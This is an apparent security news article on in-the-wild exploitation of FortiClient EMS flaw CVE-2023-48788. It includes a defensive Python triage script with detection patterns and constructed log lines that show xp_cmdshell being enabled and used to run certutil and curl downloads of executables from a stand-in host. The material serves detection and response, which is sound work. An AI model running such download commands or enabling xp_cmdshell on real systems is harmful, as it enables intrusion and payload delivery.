Hackers Exploiting FortiClient EMS Vulnerability (CVE-2023-48788) in the Wild


Cybersecurity researchers have uncovered active exploitation of a critical vulnerability in Fortinet’s FortiClient Enterprise Management Server (EMS), tracked as CVE-2023-48788.

This flaw, stemming from improper neutralization of special elements in SQL commands, allows attackers to execute unauthorized code or commands via SQL injection. Despite the availability of patches, threat actors have been leveraging this vulnerability to infiltrate enterprise networks globally.

CVE-2023-48788 affects FortiClient EMS versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2, with a critical Common Vulnerability Scoring System (CVSS) score of 9.8.

It enables unauthenticated attackers to exploit the system by sending specially crafted data packets, potentially leading to remote code execution (RCE). The vulnerability was disclosed in March 2024, with patches released in versions 7.0.11 and 7.2.3.

FortiClient EMS serves as a centralized platform for managing endpoint security policies, often exposed to the internet for remote access purposes.

This exposure increases the risk of exploitation, allowing attackers to establish initial access, conduct reconnaissance, and deploy malicious payloads.

FortiClient EMS Vulnerability Exploited in Wild

During an incident response in October 2024, Kaspersky’s Global Emergency Response Team (GERT) identified an attack on a Windows server using a vulnerable FortiClient EMS version (7.0.1).

The attackers gained access through SQL injection and deployed remote monitoring and management (RMM) tools like ScreenConnect and AnyDesk for persistence and lateral movement.

Artifacts revealed the use of tools such as mimikatz.exe for credential theft and HRSword.exe for defense evasion. Attackers also utilized native Windows binaries like certutil and curl to download additional payloads, furthering their control over compromised systems.

Evidence from system logs highlighted SQL injection attempts in FortiClient EMS logs (ems.log, sql_trace.log) and Microsoft SQL Server logs (ERRORLOG.X). These logs revealed unauthorized SQL queries that enabled remote command execution via the xp_cmdshell extended stored procedure.
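The two triage questions a responder asks here are "is this EMS build in an affected range?" and "do the EMS and SQL Server logs show the post-exploitation pattern described above?". The script below is an added example (not Fortinet's, Kaspersky's or the article's own code) that answers both: it checks a version string against the affected ranges stated earlier (7.0.1 to 7.0.10 and 7.2.0 to 7.2.2) and scans log lines for xp_cmdshell being enabled or invoked and for certutil or curl being used as downloaders. The sample log lines are constructed for this example; their layout is illustrative and does not reproduce the real ems.log, sql_trace.log or ERRORLOG formats.

```python
"""Defender-side triage helpers for CVE-2023-48788 (FortiClient EMS).

Added example, not vendor or incident-response team code.
  * is_vulnerable_version(): compares an EMS version string against the
    affected ranges given in the advisory (7.0.1-7.0.10, 7.2.0-7.2.2).
  * scan_log_lines(): flags lines in EMS / MSSQL logs that match the
    post-exploitation behaviour the write-up describes (xp_cmdshell
    enabled or invoked, certutil / curl used to fetch payloads).
The SAMPLE_LINES at the bottom are constructed; the line layout is
illustrative and not the real ems.log / sql_trace.log / ERRORLOG format.
"""
import re
from typing import List, Tuple

# Affected ranges, inclusive, from the advisory text. Fixed in 7.0.11+ and 7.2.3+.
VULNERABLE_RANGES = [((7, 0, 1), (7, 0, 10)), ((7, 2, 0), (7, 2, 2))]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '7.0.10' into (7, 0, 10); reject anything that is not x.y.z digits."""
    parts = version.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected EMS version string: {version!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable_version(version: str) -> bool:
    """True when the version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in VULNERABLE_RANGES)


# Indicators with a short reason each. Patterns are case-insensitive.
INDICATORS = [
    (re.compile(r"xp_cmdshell", re.I),
     "xp_cmdshell referenced (OS command execution through MSSQL)"),
    (re.compile(r"sp_configure\s+'?xp_cmdshell'?\s*,\s*1", re.I),
     "xp_cmdshell being enabled"),
    (re.compile(r"sp_configure\s+'?show advanced options'?\s*,\s*1", re.I),
     "advanced options enabled (prerequisite for enabling xp_cmdshell)"),
    (re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
     "certutil used as a downloader"),
    (re.compile(r"\bcurl(\.exe)?\b\s.*https?://", re.I),
     "curl used to fetch remote content"),
    (re.compile(r"(?:'|%27)\s*(?:;|--)", re.I),
     "quote followed by statement terminator or comment (SQL injection syntax)"),
]


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, reason, line) for every indicator each line matches.
    A line that matches several indicators is reported once per indicator."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for pattern, reason in INDICATORS:
            if pattern.search(line):
                hits.append((n, reason, line.rstrip()))
    return hits


# Constructed sample lines (not real log excerpts).
SAMPLE_LINES = [
    "2024-10-02 03:14:07 INFO  ems.log        client heartbeat processed for host WS-17",
    "2024-10-02 03:14:08 WARN  ems.log        unexpected quote/comment sequence in request field: ';--",
    "2024-10-02 03:14:09 DEBUG sql_trace.log  exec sp_configure 'show advanced options', 1; RECONFIGURE;",
    "2024-10-02 03:14:09 DEBUG sql_trace.log  exec sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "2024-10-02 03:14:11 DEBUG sql_trace.log  EXEC master..xp_cmdshell 'certutil.exe -urlcache -f http://example.invalid/a.exe C:\\Windows\\Temp\\a.exe'",
    "2024-10-02 03:14:12 INFO  ERRORLOG.1     SQL Server is now ready for client connections",
    "2024-10-02 03:14:15 DEBUG sql_trace.log  EXEC xp_cmdshell 'curl http://example.invalid/p.ps1 -o C:\\Windows\\Temp\\p.ps1'",
]


def triage(version: str, lines: List[str]) -> dict:
    """Combine the version check and the log scan into one result."""
    return {"vulnerable_version": is_vulnerable_version(version),
            "hits": scan_log_lines(lines)}


if __name__ == "__main__":
    result = triage("7.0.1", SAMPLE_LINES)   # 7.0.1 is the build named in the incident
    print("EMS version in affected range:", result["vulnerable_version"])
    for n, reason, line in result["hits"]:
        print(f"line {n}: {reason}\n    {line}")
```

Point the scanner at the real ems.log, sql_trace.log and ERRORLOG.X files by reading them into a list of lines; the version check is a quick filter, and a hit on "xp_cmdshell being enabled" in sql_trace.log on an internet-exposed EMS is the strongest single signal here, since normal EMS operation has no reason to turn that procedure on.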

Threat intelligence indicates widespread exploitation of CVE-2023-48788 across multiple regions and industries. Attackers have been observed targeting vulnerable systems for data exfiltration, credential theft, and ransomware deployment. Notably, groups such as the Medusa ransomware operation have exploited this vulnerability for initial access.

Organizations using FortiClient EMS must urgently update to patched versions (7.0.11 or later, 7.2.3 or later) to mitigate risks. Additional security measures include:

  • Restricting internet exposure of FortiClient EMS servers.
  • Monitoring network traffic for signs of exploitation using intrusion detection systems (IDS).
  • Implementing endpoint protection platforms (EPP) on all hosts.
  • Configuring web application firewalls (WAF) to block malicious requests.
  • Regularly reviewing system logs for suspicious activity.

This incident underscores the importance of timely patch management and robust cybersecurity practices to defend against evolving threats exploiting known vulnerabilities like CVE-2023-48788.

Published by
Cybernoz